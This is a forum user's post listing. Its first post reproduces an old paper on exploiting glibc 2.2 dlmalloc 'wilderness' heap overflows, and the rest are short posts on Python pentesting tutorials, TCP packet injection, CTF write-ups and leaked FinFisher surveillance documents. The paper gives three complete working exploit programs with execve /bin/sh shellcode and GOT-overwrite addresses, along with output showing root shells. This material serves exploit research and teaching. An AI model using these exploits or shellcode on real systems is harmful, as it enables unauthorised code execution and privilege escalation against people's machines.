Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. Exploiting The Wilderness by Phantasmal Phantasmagoria phantasmal@hush.ai - ---- Table of Contents ------------- 1 - Introduction 1.1 Prelude 1.2 The wilderness 2 - Exploiting the wilderness 2.1 Exploiting the wilderness with malloc() 2.2 Exploiting the wilderness with an off-by-one 3 - The wilderness and free() 4 - A word on glibc 2.3 5 - Final thoughts -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------ Exploiting The Wilderness by Phantasmal Phantasmagoria phantasmal@hush.ai - ---- Table of Contents ------------- 1 - Introduction 1.1 Prelude 1.2 The wilderness 2 - Exploiting the wilderness 2.1 Exploiting the wilderness with malloc() 2.2 Exploiting the wilderness with an off-by-one 3 - The wilderness and free() 4 - A word on glibc 2.3 5 - Final thoughts - ------------------------------------ - ---- Introduction ------------------ - ---- Prelude This paper outlines a method of exploiting heap overflows on dlmalloc based glibc 2.2 systems. In situations where an overflowable buffer is contiguous to the wilderness it is possible to acheive the aa4bmo primitive [1]. This article is written with an x86/Linux target in mind. It is assumed the reader is familiar with the dlmalloc chunk format and the traditional methods of exploiting dlmalloc based overflows [2][3]. It may be desired to obtain a copy of the complete dlmalloc source code from glibc itself, as excerpts are simplified and may lose a degree of context. - ---- The wilderness The wilderness is the top-most chunk in allocated memory. It is similar to any normal malloc chunk - it has a chunk header followed by a variably long data section. The important difference lies in the fact that the wilderness, also called the top chunk, borders the end of available memory and is the only chunk that can be extended or shortened. This means it must be treated specially to ensure it always exists; it must be preserved. The wilderness is only used when a call to malloc() requests memory of a size that no other freed chunks can facilitate. If the wilderness is sufficiently large enough to handle the request it is split in to two, one part being returned for the call to malloc(), and the other becoming the new wilderness. In the event that the wilderness is not large enough to handle the request, it is extended with sbrk() and split as described above. This behaviour means that the wilderness will always exist, and furthermore, its data section will never be used. This is called wilderness preservation and as such, the wilderness is treated as the last resort in allocating a chunk of memory [4]. Consider the following example: /* START wilderness.c */ #include <stdio.h> int main(int argc, char *argv[]) { char *first, *second; first = (char *) malloc(1020); /* [A] */ strcpy(first, argv[1]); /* [B] */ second = (char *) malloc(1020); /* [C] */ strcpy(second, "polygoria!"); printf("%p | %s\n", first, second); } /* END wilderness.c */ It can be logically deduced that since no previous calls to free() have been made our malloc() requests are going to be serviced by the existing wilderness chunk. The wilderness is split in two at [A], one chunk of 1024 bytes (1020 + 4 for the size field) becomes the 'first' buffer, while the remaining space is used for the new wilderness. This same process happens again at [C]. Keep in mind that the prev_size field is not used by dlmalloc if the previous chunk is allocated, and in that situation can become part of the data of the previous chunk to decrease wastage. The wilderness chunk does not utilize prev_size (there is no possibility of the top chunk being consolidated) meaning it is included at the end of the 'first' buffer at [A] as part of its 1020 bytes of data. Again, the same applies to the 'second' buffer at [C]. The wilderness chunk being handled specially by the dlmalloc system led to Michel "MaXX" Kaempf stating in his 'Vudo malloc tricks' [2] article, "The wilderness chunk is one of the most dangerous opponents of the attacker who tries to exploit heap mismanagement". It is this special handling of the wilderness that we will be manipulating in our exploits, turning the dangerous opponent into, perhaps, an interesting conquest. - ------------------------------------ - ---- Exploiting the wilderness ----- - ---- Exploiting the wilderness with malloc() Looking at our sample code above we can see that a typical buffer overflow exists at [B]. However, in this situation we are unable to use the traditional unlink technique due to the overflowed buffer being contiguous to the wilderness and the lack of a relevant call to free(). This leaves us with the second call to malloc() at [C] - we will be exploiting the special code used to set up our 'second' buffer from the wilderness. Based on the knowledge that the 'first' buffer borders the wilderness, it is clear that not only can we control the prev_size and size elements of the top chunk, but also a considerable amount of space after the chunk header. This space is the top chunk's unused data area and proves crucial in forming a successful exploit. Lets have a look at the important chunk_alloc() code called from our malloc() requests: /* Try to use top chunk */ /* Require that there be a remainder, ensuring top always exists */ if ((remainder_size = chunksize(top(ar_ptr)) - nb) < (long)MINSIZE) /* [A] */ { ... malloc_extend_top(ar_ptr, nb); ... } victim = top(ar_ptr); set_head(victim, nb | PREV_INUSE); top(ar_ptr) = chunk_at_offset(victim, nb); set_head(top(ar_ptr), remainder_size | PREV_INUSE); return victim; This is the wilderness chunk code. It checks to see if the wilderness is large enough to service a request of nb bytes, then splits and recreates the top chunk as described above. If the wilderness is not large enough to hold the minimum size of a chunk (MINSIZE) after nb bytes are used, the heap is extended using malloc_extend_top(): mchunkptr old_top = top(ar_ptr); INTERNAL_SIZE_T old_top_size = chunksize(old_top); /* [B] */ char *brk; ... char *old_end = (char*)(chunk_at_offset(old_top, old_top_size)); ... brk = sbrk(nb + MINSIZE); /* [C] */ ... if (brk == old_end) { /* [D] */ ... old_top = 0; } ... /* Setup fencepost and free the old top chunk. */ if(old_top) { /* [E] */ old_top_size -= MINSIZE; set_head(chunk_at_offset(old_top, old_top_size + 2*SIZE_SZ), 0|PREV_INUSE); if(old_top_size >= MINSIZE) { /* [F] */ set_head(chunk_at_offset(old_top, old_top_size), (2*SIZE_SZ)|PREV_INUSE); set_foot(chunk_at_offset(old_top, old_top_size), (2*SIZE_SZ)); set_head_size(old_top, old_top_size); chunk_free(ar_ptr, old_top); } else { ... } } The above is a simplified version of malloc_extend_top() containing only the code we are interested in. We can see the wilderness being extended at [C] with the call to sbrk(), but more interesting is the chunk_free() request in the 'fencepost' code. A fencepost is a space of memory set up for checking purposes [5]. In the case of dlmalloc they are relatively unimportant, but the code above provides the crucial element in exploiting the wilderness with malloc(). The call to chunk_free() gives us a glimpse, a remote possibility, of using the unlink() macro in a nefarious way. As such, the chunk_free() call is looking very interesting. However, there are a number of conditions that we have to meet in order to reach the chunk_free() call reliably. Firstly, we must ensure that the if statement at [A] returns true, forcing the wilderness to be extended. Once in malloc_extend_top(), we have to trigger the fencepost code at [E]. This can be done by avoiding the if statement at [D]. Finally, we must handle the inner if statement at [F] leading to the call to chunk_free(). One other problem arises in the form of the set_head() and set_foot() calls. These could potentially destroy important data in our attack, so we must include them in our list of things to be handled. That leaves us with four items to consider just in getting to the fencepost chunk_free() call. Fortunately, all of these issues can be solved with one solution. As discussed above, we can control the wilderness' chunk header, essentialy giving us control of the values returned from chunksize() at [A] and [B]. Our solution is to set the overflowed size field of the top chunk to a negative value. Lets look at why this works: - A negative size field would trigger the first if statement at [A]. This is because remainder_size is signed, and when set to a negative number still evaluates to less than MINSIZE. - The altered size element would be used for old_top_size, meaning the old_end pointer would appear somewhere other than the actual end of the wilderness. This means the if statement at [D] returns false and the fencepost code at [E] is run. - The old_top_size variable is unsigned and would appear to be a large positive number when set to our negative size field. This means the statement at [F] returns true, as old_top_size evaluates to be much greater than MINSIZE. - The potentially destructive chunk header modifying calls would only corrupt unimportant padding within our overflowed buffer as the negative old_top_size is used for an offset. Finally, we can reach our call to chunk_free(). Lets look at the important bits: INTERNAL_SIZE_T hd = p->size; ... if (!hd & PREV_INUSE)) /* consolidate backward */ /* [A] */ { prevsz = p->prev_size; p = chunk_at_offset(p, -(long)prevsz); /* [B] */ sz += prevsz; if (p->fd == last_remainder(ar_ptr)) islr = 1; else unlink(p, bck, fwd); } The call to chunk_free() is made on old_top (our overflowed wilderness) meaning we can control p->prev_size and p->size. Backward consolidation is normally used to merge two free chunks together, but we will be using it to trigger the unlink() bug. Firstly, we need to ensure the backward consolidation code is run at [A]. As we can control p->size, we can trigger backward consolidation simply by clearing the overflowed size element's PREV_INUSE bit. From here, it is p->prev_size that becomes important. As mentioned above, p->prev_size is actually part of the buffer we're overflowing. Exploiting dlmalloc by using backwards consolidation was briefly considered in the article 'Once upon a free()' [3]. The author suggests that it is possible to create a 'fake chunk' within the overflowed buffer - that is, a fake chunk relatively negative to the overflowed chunk header. This would require setting p->prev_size to a small positive number which in turn gets complemented in to its negative counterpart at [B] (digression: please excuse my stylistic habit of replacing the more technically correct "two's complement" with "complement"). However, such a small positive number would likely contain NULL terminating bytes, effectively ending our payload before the rest of the overflow is complete. This leaves us with one other choice; creating a fake chunk relatively positive to the start of the wilderness. This can be achieved by setting p->prev_size to a small negative number, turned in to a small positive number at [B]. This would require the specially crafted forward and back pointers to be situated at the start of the wilderness' unused data area, just after the chunk header. Similar to the overflowed size variable discussed above, this is convinient as the negative number need not contain NULL bytes, allowing us to continue the payload into the data area. For the sake of the exploit, lets go with a prev_size of -4 or 0xfffffffc and an overflowed size of -16 or 0xfffffff0. Clearly, our prev_size will get turned into an offset of 4, essentialy passing the point 4 bytes past the start of the wilderness (the start being the prev_size element itself) to the unlink() macro. This means that our fake fwd pointer will be at the wilderness + 12 bytes and our bck pointer at the wilderness + 16 bytes. An overflowed size of -16 places the chunk header modifying calls safely into our padding, while still satisfying all of our other requirements. Our payload will look like this: |...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPPPP|SSSSWWWWFFFFBBBBWWWWWWWW...| A = Target buffer that we control. Some of this will be trashed by the chunk header modifying calls, important when considering shellcode placement. P = The prev_size element of the wilderness chunk. This is part of our target buffer. We set it to -4. S = The overflowed size element of the wilderness chunk. We set it to -16. W = Unimportant parts of the wilderness. F = The fwd pointer for the call to unlink(). We set it to the target return location - 12. B = The bck pointer for the call to unlink(). We set it to the return address. We're now ready to write our exploit for the vulnerable code discussed above. Keep in mind that a malloc request for 1020 is padded up to 1024 to contain room for the size field, so we are exactly contiguous to the wilderness. $ gcc -o wilderness wilderness.c $ objdump -R wilderness | grep printf 08049650 R_386_JUMP_SLOT printf $ ./wilderness 123 0x8049680 | polygoria! /* START exploit.c */ #include <string.h> #include <stdlib.h> #include <unistd.h> #define RETLOC 0x08049650 /* GOT entry for printf */ #define RETADDR 0x08049680 /* start of 'first' buffer data */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *p, *payload = (char *) malloc(1052); p = payload; memset(p, '\x90', 1052); /* Jump 12 ahead over the trashed word from unlink() */ memcpy(p, "\xeb\x0c", 2); /* We put the shellcode safely away from the possibly * corrupted area */ p += 1020 - 64 - sizeof(shellcode); memcpy(p, shellcode, sizeof(shellcode) - 1); /* Set up the prev_size and overflow size fields */ p += sizeof(shellcode) + 64 - 4; *(long *) p = -4; p += 4; *(long *) p = -16; /* Set up the fwd and bck of the fake chunk */ p += 8; *(long *) p = RETLOC - 12; p += 4; *(long *) p = RETADDR; p += 4; *(p) = '\0'; execl("./wilderness", "./wilderness", payload, NULL); } /* END exploit.c */ $ gcc -o exploit exploit.c $ ./exploit sh-2.05a# - ---- Exploiting the wilderness with an off-by-one Lets modify our original vulnerable code to contain an off-by-one condition: /* START wilderness2.c */ #include <stdio.h> int main(int argc, char *argv[]) { char *first, *second; int x; first = (char *) malloc(1020); for(x = 0; x <= 1020 && argv[1][x] != '\0'; x++) /* [A] */ first[x] = argv[1][x]; second = (char *) malloc(2020); /* [B] */ strcpy(second, "polygoria!"); printf("%p %p | %s\n", first, argv[1], second); } /* END wilderness2.c */ Looking at this sample code we can see the off-by-one error occuring at [A]. The loop copies 1021 bytes of argv[1] into a buffer, 'first', allocated only 1020 bytes. As the 'first' buffer was split off the top chunk in its allocation, it is exactly contiguous to the wilderness. This means that our one byte overflow destroys the least significant byte of the top chunk's size field. When exploiting off-by-one conditions involving the wilderness we will use a similar technique to that discussed above in the malloc() section; we want to trigger malloc_extend_top() in the second call to malloc() and use the fencepost code to cause an unlink() to occur. However, there are a couple of important issues that arise further to those discussed above. The first new problem is found in trying to trigger malloc_extend_top() from the wilderness code in chunk_alloc(). In order to force the heap to extend the size of the wilderness minus the size of our second request (2020) needs to be less than 16. When we controlled the entire size field in the section above this was not a problem as we could easily set a value less than 16, but since we can only control the least significant byte of the wilderness' size field we can only decrease the size by a limited amount. This means that in some situations where the wilderness is too big we cannot trigger the heap extension code. Fortunately, it is common in real world situations to have some sort of control over the size of the wilderness through attacker induced calls to malloc(). Assuming that our larger second request to malloc() will attempt to extend the heap, we now have to address the other steps in running the fencepost chunk_free() call. We know that we can comfortably reach the fencepost code as we are modifying the size element of the wilderness. The inner if statement leading to the chunk_free() is usually triggered as either our old_top_size is greater than 16, or the wilderness' size is small enough that controlling the least significant byte is enough to make old_top_size wrap around when MINSIZE is subtracted from it. Finally, the chunk header modifying calls are unimportant, so long as they occur in allocated memory as to avoid a premature segfault. The reason for this will become clear in a short while. All we have left to do is to ensure that the PREV_INUSE bit is cleared for backwards consolidation at the chunk_free(). This is made trivial by our control of the size field. Once again, as we reach the backward consolidation code it is the prev_size field that becomes important. We have already determined that we have to use a negative prev_size value to ensure our payload is not terminated by stray NULL bytes. The negative prev_size field causes the backward consolidation chunk_at_offset() call to use a positive offset from the start of the wilderness. However, unlike the above situation we do not control any of the wilderness after the overflowed least significant byte of the size field. Knowing that we can only go forward in memory at the consolidation and that we don't have any leverage on the heap, we have to shift our attention to the stack. The stack may initally seem to be an unlikely factor when considering a heap overflow, but in our case where we can only increase the values passed to unlink() it becomes quite convinient, especially in a local context. Stack addresses are much higher in memory than their heap counterparts and by correctly setting the prev_size field of the wilderness, we can force an unlink() to occur somewhere on the stack. That somewhere will be our payload as it sits in argv[1]. Using this heap-to-stack unlink() technique any possible corruption of our payload in the heap by the chunk header modifying calls is inconsequential to our exploit; the heap is only important in triggering the actual overflow, the values for unlink() and the execution of our shellcode can be handled on the stack. The correct prev_size value can be easily calculated when exploiting a local vulnerability. We can discover the address of both argv[1] and the 'first' buffer by simulating our payload and using the output of running the vulnerable program. We also know that our prev_size will be complemented into a positive offset from the start of the wilderness. To reach argv[1] at the chunk_at_offset() call we merely have to subtract the address of the start of the wilderness (the end of the 'first' buffer minus 4 for prev_size) from the address of argv[1], then complement the result. This leaves us with the following payload: |FFFFBBBBDDDDDDDDD...DDDDDDDDPPPP|SWWWWWWWWWWW...| F = The fwd pointer for the call to unlink(). We set it to the target return location - 12. B = The bck pointer for the call to unlink(). We set it to the return address. D = Shellcode and NOP padding, where we will return in argv[1]. S = The overflowed byte in the size field of the wilderness. We set it to the lowest possible value that still clears PREV_INUSE, 2. W = Unimportant parts of the wilderness. $ gcc -o wilderness2 wilderness2.c $ objdump -R wilderness2 | grep printf 08049684 R_386_JUMP_SLOT printf /* START exploit2.c */ #include <string.h> #include <stdlib.h> #include <unistd.h> #define RETLOC 0x08049684 /* GOT entry for printf */ #define ARGV1 0x01020304 /* start of argv[1], handled later */ #define FIRST 0x04030201 /* start of 'first', also handled later */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *p, *payload = (char *) malloc(1028); long prev_size; p = payload; memset(p, '\x90', 1028); *(p + 1021) = '\0'; /* Set the fwd and bck for the call to unlink() */ *(long *) p = RETLOC - 12; p += 4; *(long *) p = ARGV1 + 8; p += 4; /* Jump 12 ahead over the trashed word from unlink() */ memcpy(p, "\xeb\x0c", 2); /* Put shellcode at end of NOP sled */ p += 1012 - 4 - sizeof(shellcode); memcpy(p, shellcode, sizeof(shellcode) - 1); /* Set up the special prev_size field. We actually want to * end up pointing to 8 bytes before argv[1] to ensure the * fwd and bck are hit right, so we add 8 before * complementing. */ prev_size = -(ARGV1 - (FIRST + 1016)) + 8; p += sizeof(shellcode); *(long *) p = prev_size; /* Allow for a test condition that will not segfault the * target when getting the address of argv[1] and 'first'. * With 0xff malloc_extend_top() returns early due to error * checking. 0x02 is used to trigger the actual overflow. */ p += 4; if(argc > 1) *(char *) p = 0xff; else *(char *) p = 0x02; execl("./wilderness2", "./wilderness2", payload, NULL); } /* END exploit2.c */ $ gcc -o exploit2 exploit2.c $ ./exploit2 test 0x80496b0 0xbffffac9 | polygoria! $ cat > diffex 6,7c6,7 < #define ARGV1 0x01020304 /* start of argv[1], handled later */ < #define FIRST 0x04030201 /* start of 'first', also handled later */ - --- > #define ARGV1 0xbffffac9 /* start of argv[1] */ > #define FIRST 0x080496b0 /* start of 'first' */ $ patch exploit2.c diffex patching file exploit2.c $ gcc -o exploit2 exploit2.c $ ./exploit2 sh-2.05a# - ------------------------------------ - ---- The wilderness and free() ----- Lets now consider the following example: /* START wilderness3a.c */ #include <stdio.h> int main(int argc, char *argv[]) { char *first, *second; first = (char *) malloc(1020); strcpy(first, argv[1]); free(first); second = (char *) malloc(1020); } /* END wilderness3a.c */ Unfortunately, this situation does not appear to be exploitable. When exploiting the wilderness calls to free() are your worst enemy. This is because chunk_free() handles situations directly involving the wilderness with different code to the normal backward or forward consolidation. Although this special 'top' code has its weaknesses, it does not seem possible to either directly exploit the call to free(), nor survive it in a way possible to exploit the following call to malloc(). For those interested, lets have a quick look at why: INTERNAL_SIZE_T hd = p->size; INTERNAL_SIZE_T sz; ... mchunkptr next; INTERNAL_SIZE_T nextsz; ... sz = hd & ~PREV_INUSE; next = chunk_at_offset(p, sz); nextsz = chunksize(next); /* [A] */ if (next == top(ar_ptr)) { sz += nextsz; /* [B] */ if (!(hd & PREV_INUSE)) /* [C] */ { ... } set_head(p, sz | PREV_INUSE); /* [D] */ top(ar_ptr) = p; ... } Here we see the code from chunk_free() used to handle requests involving the wilderness. Note that the backward consolidation within the 'top' code at [C] is uninteresting as we do not control the needed prev_size element. This leaves us with the hope of using the following call to malloc() as described above. In this situation we control the value of nextsz at [A]. We can see that the chunk being freed is consolidated with the wilderness. We can control the new wilderness' size as it is adjusted with our nextsz at [B], but unfortunately, the PREV_INUSE bit is set at the call to set_head() at [D]. The reason this is a bad thing becomes clear when considering the possibilites of using backward consolidation in any future calls to malloc(); the PREV_INUSE bit needs to be cleared. Keeping with the idea of exploiting the following call to malloc() using the fencepost code, there are a few other options - all of which appear to be impossible. Firstly, forward consolidation. This is made unlikely by the fencepost chunk header modifying calls discussed above, as they usually ensure that the test for forward consolidation will fail. The frontlink() macro has been discussed [2] as another possible method of exploiting dlmalloc, but since we do not control any of the traversed chunks this technique is uninteresting. The final option was to use the fencepost chunk header modifying calls to partially overwrite a GOT entry to point into an area of memory we control. Unfortunately, all of these modifying calls are aligned, and there doesn't seem to be anything else we can do with the values we can write. Now that we have determined what is impossible, lets have a look at what we can do when involving the wilderness and free(): /* START wilderness3b.c */ #include <stdio.h> int main(int argc, char *argv[]) { char *first, *second; first = (char *) malloc(1020); second = (char *) malloc(1020); strcpy(second, argv[1]); /* [A] */ free(first); /* [B] */ free(second); } /* END wilderness3b.c */ The general aim of this contrived example is to avoid the special 'top' code discussed above. The wilderness can be overflowed at [A], but this is directly followed by a call to free(). Fortunately, the chunk to be freed is not bordering the wilderness, and thus the 'top' code is not invoked. To exploit this we will be using forward consolidation at [B], the first call to free(). /* consolidate forward */ if (!(inuse_bit_at_offset(next, nextsz))) { sz += nextsz; if (!islr && next->fd == last_remainder(ar_ptr)) { ... } else unlink(next, bck, fwd); next = chunk_at_offset(p, sz); } At the first call to free() 'next' points to our 'second' buffer. This means that the test for forward consolidation looks at the size value of the wilderness. To trigger the unlink() on our 'next' buffer we need to overflow the wilderness' size field to clear the PREV_INUSE bit. Our payload will look like this: |FFFFBBBBDDDDDDDD...DDDDDDDD|SSSSWWWWWWWWWWWWWWWW...| F = The fwd pointer for the call to unlink(). We set it to the target return location - 12. B = The bck pointer for the call to unlink(). We set it to the return address. D = Shellcode and NOP padding, where we will return. S = The overflowed size field of the wilderness chunk. A value of -4 will do. W = Unimportant parts of the wilderness. We're now ready for an exploit. $ gcc -o wilderness3b wilderness3b.c $ objdump -R wilderness3b | grep free 0804962c R_386_JUMP_SLOT free $ ltrace ./wilderness3b 1986 2>&1 | grep malloc | tail -n 1 malloc(1020) = 0x08049a58 /* START exploit3b.c */ #include <string.h> #include <stdlib.h> #include <unistd.h> #define RETLOC 0x0804962c /* GOT entry for free */ #define RETADDR 0x08049a58 /* start of 'second' buffer data */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *p, *payload = (char *) malloc(1052); p = payload; memset(p, '\x90', 1052); /* Set up the fwd and bck pointers to be unlink()'d */ *(long *) p = RETLOC - 12; p += 4; *(long *) p = RETADDR + 8; p += 4; /* Jump 12 ahead over the trashed word from unlink() */ memcpy(p, "\xeb\x0c", 2); /* Position shellcode safely at end of NOP sled */ p += 1020 - 8 - sizeof(shellcode) - 32; memcpy(p, shellcode, sizeof(shellcode) - 1); p += sizeof(shellcode) + 32; *(long *) p = -4; p += 4; *(p) = '\0'; execl("./wilderness3b", "./wilderness3b", payload, NULL); } /* END exploit3b.c */ $ gcc -o exploit3b exploit3b.c $ ./exploit3b sh-2.05a# - ------------------------------------ - ---- A word on glibc 2.3 ----------- Although exploiting our examples on a glibc 2.3 system would be an interesting activity it does not appear possible to utilize the techniques described above. Specifically, although the fencepost code exists on both platforms, the situations surrounding them are vastly different. For those genuinely interested in a more detailed explanation of the difficulties involving the fencepost code on glibc 2.3, feel free to contact me. - ------------------------------------ - ---- Final thoughts ---------------- For an overflow involving the wilderness to exist on a glibc 2.2 platform might seem a rare or esoteric occurance. However, the research presented above was not prompted by divine inspiration, but in response to a tangible need. Thus it was not so much important substance that inclined me to release this paper, but rather the hope that obscure substance might be reused for some creative good by another. - ------------------------------------ [1] http://www.phrack.org/show.php?p=61&a=6 [2] http://www.phrack.org/show.php?p=57&a=8 [3] http://www.phrack.org/show.php?p=57&a=9 [4] http://gee.cs.oswego.edu/dl/html/malloc.html [5] http://www.memorymanagement.org/glossary/f.html#fencepost - ------------------------------------ -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.3 wkYEARECAAYFAkA6PcsACgkQImcz/hfgxg0F0QCeOJsU+ZFJ+d+Cg0g5lpSio11QGqQA n3z6846AfkvZ3/BXqUGmciT4Brvw =k/EC -----END PGP SIGNATURE----- Sursa: https://www.thc.org/root/docs/exploit_writing/Exploiting%20the%20wilderness.txt
  2. This tutorial series is designed for those who don’t come from a programming background. Each tutorial will cover common use cases for Python scripting geared for InfoSec professionals. From “Hello World” to custom Python malware, and exploits: 0×0 – Getting Started 0×1 – Port Scanner 0×2 – Reverse Shell 0×3 – Fuzzer 0×4 – Python to EXE 0×5 – Web Requests 0×6 – Spidering 0×7 – Web Scanning and Exploitation 0×8 – Whois Automation 0×9 – Command Automation 0xA – Python for Metasploit Automation 0xB – Pseudo-Terminal 0xC – Python Malware Sursa: Python Tutorials ? Primal Security Podcast
  3. [h=1]TCP Packet Injection with Python[/h] [h=2]TCP Packet Injection with Python[/h] Packet injection is the process of interfering with an established network connection by constructing arbitrary protocol packets (TCP, UDP, ...) and send them out through raw sockets it's used widely in network penetration testing such as DDoS, TCP reset attacks, port scanning... A Packet is a combination of IP header, TCP/UDP header and data: Packet = IP Header + TCP/UDP Header + Data Most operating systems that implements socket API supports packet injection, especially those based on Berkeley Sockets. Microsoft limited raw sockets capabilities to packet sniffing, after Windows XP release. This tutorial is implemented on Unix-Like operating systems. [h=3]TCP Header[/h]The TCP protocol is the most used transport protocol in the world wide web, it provides a reliable, ordered and error-checked delivery of a stream of bytes between programs running on computers connected to network. 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Port | Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Sequence Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Acknowledgment Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Data | |U|A|P|R|S|F| | | Offset| Reserved |R|C|S|S|Y|I| Window | | | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Checksum | Urgent Pointer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Options | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | data | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Sequence Number (32 bits): the sequence number of the first data byte in this segment. if the SYN flag is set, the sequence number should be the initial sequence number (ISN: usually 0), and the first data byte in the first data stream should be ISN+1 (1). Acknowledgment Number (32 bits): If the ACK flag is set, this field contains the value of the next sequence number the destination machine is expecting to receive. for every packet contains data is sent, an acknowledgment packet should be received, to acknowledge that the last packet is successfully received. Data Offset (4 bits): The length of TCP header by providing the number of 32-bit words. this indicates where the data begins. Reserved (6 bits): Usually cleared to zero Control Bits (6 bits): ACK: Acknowledgment packet SYN: Request to establish a connection RST: Request to reset connection FIN: Request to interrupt (close) a connection PSH: Informs TCP that data should be sent immediately (Useful in real-time applications) URG: Urgent Pointer field is significant Window: The number of data bytes you can send before you should stop and wait for acknowledgement Checksum: used for error-checking of the header and data Urgent Pointer: If the URG control flag is set, this field is an offset from the sequence number indicating the last urgent data byte This feature is used when some information has to reach it's destination as soon as possible. Articol: TCP Packet Injection with Python | Python for Pentesting
  4. [h=1]CTF write-ups[/h] There are some problems with CTF write-ups in general: they’re scattered across the interwebs they don’t usually include the original files needed to solve the challenge some of them are incomplete or skip ‘obvious’ parts of the explanation, and are therefore not as helpful for newcomers often they disappear when the owner forgets to renew their domain or shuts down their blog This repository aims to solve those problems. It’s a collection of CTF source files and write-ups that anyone can contribute to. Did you just publish a CTF write-up? Let us know, and we’ll add a link to your post — or just add the link yourself and submit a pull request. Spot an issue with a solution? Correct it, and send a pull request. Link: https://github.com/ctfs/write-ups
  5. Six things we know from the latest FinFisher documents By: Kenneth Page on: 15-Aug-2014 The publishing of materials from a support server belonging to surveillance-industry giant Gamma International has provided a trove of information for technologists, security researchers and activists. This has given the world a direct insight into a tight-knit industry, which demands secrecy for themselves and their clients, but ultimately assists in the violation human rights of ordinary people without care or reproach. Now for the first time, there is solid confirmation of Gamma's activities from inside the company's own files, despite their denials, on their clients and support provided to a range of governments. The Anglo-German company Gamma International is widely known for the intrusion software suite FinFisher, which was spun off into its own German-based company "FinFisher GmbH" sometime in 2013. The 40GB dump of internal documents, brochures, pricelists, logs, and support queries were made available through a Torrent first linked to on a Reddit post by the alleged hacker, who also set up a Twitter handle posting the documents. While these documents do provide insight into FinFisher, Privacy International does not support any attempt to compromise the security of any company's network or servers. Greater transparency is needed from this sector, and from Governments on this growing industry to ensure that every businesses obligation to respect human rights is met. Some documents provide new information; others support and verify previous claims about the company. Privacy International is still reviewing and analysing all the documents, so we expect more information to come out of these documents in the near future. 1. No targeting of Germany FinFisher's command and control servers have been found in nearly 40 countries around the world. But these new documents reveal that if you want to use FinFisher products, customers can't target devices in Germany, according to a clause contained within what appears to be a generic commercial offer the company provides to all their customers. Article 21 of a commercial offer states: The BUYER hereby acknowledges that it is a strict term of this supply contract that it will not use the articles supplied in obtaining any data or software from any computer or related devices or impairing or interfering in the operation of any computer where, in either such case, there is significant link (however arising) in relation to such action or on relation to any other relevant circumstances, with Germany and hereby undertakes and warrants to FinFisher that it will not make use of the articles supplied It is an odd clause to be contained within an offer. FinFisher is designed to work on a target machine regardless of location; a key selling point of FinFisher is offering the ability of its user to monitor a target anywhere in the world. It is unclear why the buyer is specifically banned from using FinFisher to target devices in Germany, but there are a couple of reasonable possibilities. The first possibility could be that it is a condition of the German government to allow FinFisher to be based in and exported from Germany only if it is not used against German targets. It is also possible that that FinFisher itself is looking to minimize any attention they get in Germany, be it via security agencies or the press. It further could well be a legal precaution related to computer misuse legislation, designed to minimize legal accountability. Privacy International has written to the German Federal Office for Economic Affairs and Export Control (BAFA) asking for clarification, and to assess whether the German government requires or is aware of such a clause prohibiting the targeting of German devices using German-made surveillance technology exported out of the country. 2. The targeting of activists The Gamma documents also cast doubt on their own previous claims that the Bahraini Government used a stolen demonstration copy of FinFisher against pro-democracy activists. Excellent work by Bahrain Watch signals that the Bahraini Government had reportedly targeted a range of prominent Bahraini lawyers, human rights workers, and politicians. Zeroing in on specific information related to Bahrain, the group claims to have identified 77 computers of activists targeted by FinFisher. It was the allegations and technical analysis of 2012 that Gamma's products were used to spy on Bahraini pro-democracy activists that really began to show the truly invasive implications and violations associated with their technology. This new potentially damning evidence comes in the form of the communications revealed between the supposed Bahraini authorities and Gamma's support service - again an element of their comprehensive support package. Logs show requests for assistance in solving problems occurring in the deployment of the malware, including that some anti-virus programs were detecting their presence, login details were not working, the 'targets' were not appearing, and so on. These documents and the subsequent analysis by Bahrain Watch give credence to long-suspected behaviour of the Bahraini Government when it comes to targeting activists with FinFisher, and calls into question Gamma's previous statements on their relationship with Bahrain. Several of the individuals identified by Bahrain Watch are either now imprisoned or sentenced in absentia, showing the on-the-ground impact and role of surveillance technologies in the hands of repressive regimes. 3. The industry is slick Once a negligible industry in 2001, within ten years it was estimated the sector was worth approximately $5 